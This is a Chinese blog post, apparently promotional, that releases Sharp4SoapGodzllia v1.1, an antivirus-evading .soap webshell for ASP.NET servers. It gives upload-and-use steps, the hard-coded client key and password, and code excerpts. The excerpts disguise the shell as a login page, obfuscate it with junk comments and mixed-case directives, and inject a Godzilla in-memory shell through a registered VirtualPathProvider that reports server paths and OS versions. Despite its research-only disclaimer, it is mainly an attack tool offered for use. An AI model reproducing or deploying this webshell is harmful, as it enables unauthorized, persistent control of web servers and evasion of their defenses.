.NET SoapShell 更新 | 发布增强免杀版适配哥斯拉客户端的WebShell

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4SoapGodzlliav1.1.soap是一款增强免杀的 SoapShell,支持在服务器上植入哥斯拉内存马,这款工具不仅可以灵活地运行在服务器的根目录或子目录下,还通过多种技术手段提高了 Bypass能力,为后续的信息搜集和渗透攻击提供了重要支持。

图片

03使用方法

将 Sharp4SoapGodzlliav1.1.soap 文件上传到服务器的目标目录,上传文件成功后可以自动植入支持哥斯拉的内存马,具体的访问路径会以响应信息的形式返回,供用户参考。通常情况下,内存马的访问路径会如以下示例所示

uploadfiles/dotNetMatrix/Godzllia1.1.aspx

成功植入内存马后,Sharp4SoapGodzlliav1.1 将会返回详细的服务器环境信息,便于攻击者进一步分析。这些信息包括内存马具体的访问路径、网站当前的绝对路径、.NET Framework版本以及Windows操作系统版本等

图片

要使用“哥斯拉”客户端与服务器上的 Sharp4SoapGodzllia v1.1 内存马进行交互,需要将密钥和密码均设置为 dotNetMatrix,这样客户端即可顺利连接到目标服务器上的内存马,并执行各种命令和操作。

图片

04原理解析

以下是Sharp4SoapGodzllia v1.1的一部分代码,利用HTML和JavaScript以及Unicode编码进行隐蔽操作:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="Head1"><title></title>
    <link href="favorate.ico?ver=286.7" rel="shortcut icon" type="image/x-icon" />
    <!--<script src="Content/Script/cloud.js" type="text/javascript"></script>-->
    <style>
        .icon {
            position: relative;
        }

        .icon_one, .icon_two {
            position: absolute;
            top: 25%;
            left: 58px;
            color: #7f8499;
        }
    </style>
</head>

随后,通过使用注释和不可见字符,Sharp4SoapGodzllia v1.1 能够有效地规避安全软件的查杀和拦截。

<script type="text/javascript">
    $(function () {
        $('.loginbox').fadeIn();
        if (document.getElementById("User").value == "") {
            document.getElementById("User").focus();
        } else {
            document.getElementById("User").focus();
        }
    });
</script>
<%@ PAge LaNgUagE=cs%>
<%/*UoWa*//*UoWa*/try/*UoWa*/{/*UoWa*//*UoWa*/%>
<!--<body style="background-color: #1c77ac; background-image: url(Content/img.png); background-repeat: no-repeat; background-position: center top; overflow: hidden;">-->

接着,通过base64编码和RegisterVirtualPathProvider方法实现哥斯拉内存马注入,具体代码如下所示。

SamplePathProvider sampleProvider = new SamplePathProvider(targetVirtualPath, webshellContent);
System.Web.Hosting.HostingEnvironment.RegisterVirtualPathProvider(sampleProvider);
System.Web.HttpContext.Current.Response.Write("<pre style='text-align: center;font-weight: Bold;'> Soap Memory Shell For Godzllia </pre>");
System.Web.HttpContext.Current.Response.Write("<pre>");
System.Web.HttpContext.Current.Response.Write("1. Memory Shell Path: " + targetVirtualPath + "Godzllia1.1.aspx \r\n");
System.Web.HttpContext.Current.Response.Write("2. WebSite Application Path: " +  System.Web.HttpContext.Current.Server.MapPath(System.Web.HttpContext.Current.Request.ApplicationPath) + "\r\n");
System.Web.HttpContext.Current.Response.Write("3. dotNet FrameWork Version: " + System.Environment.Version + "\r\n" );
System.Web.HttpContext.Current.Response.Write("4. Windows OSVersion: " + System.Environment.OSVersion + "\r\n" );
System.Web.HttpContext.Current.Response.Write("5. Just for Research, Do Not Abuse It! Author: dotNet Security Matrix Team  \r\n" );
System.Web.HttpContext.Current.Response.Write("</pre>");
System.Web.HttpContext.Current.Response.End();

综上,Sharp4SoapGodzllia v1.1 作为增强免杀的 Webshell 工具,不仅能在服务器上植入内存马,还可以返回详细的服务器环境信息。

 05.NET安全知识库

图片

图片

星球文化20+个专题栏目涵盖了点、线、面、体等知识面!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    

图片

图片

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

dot.Net安全矩阵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值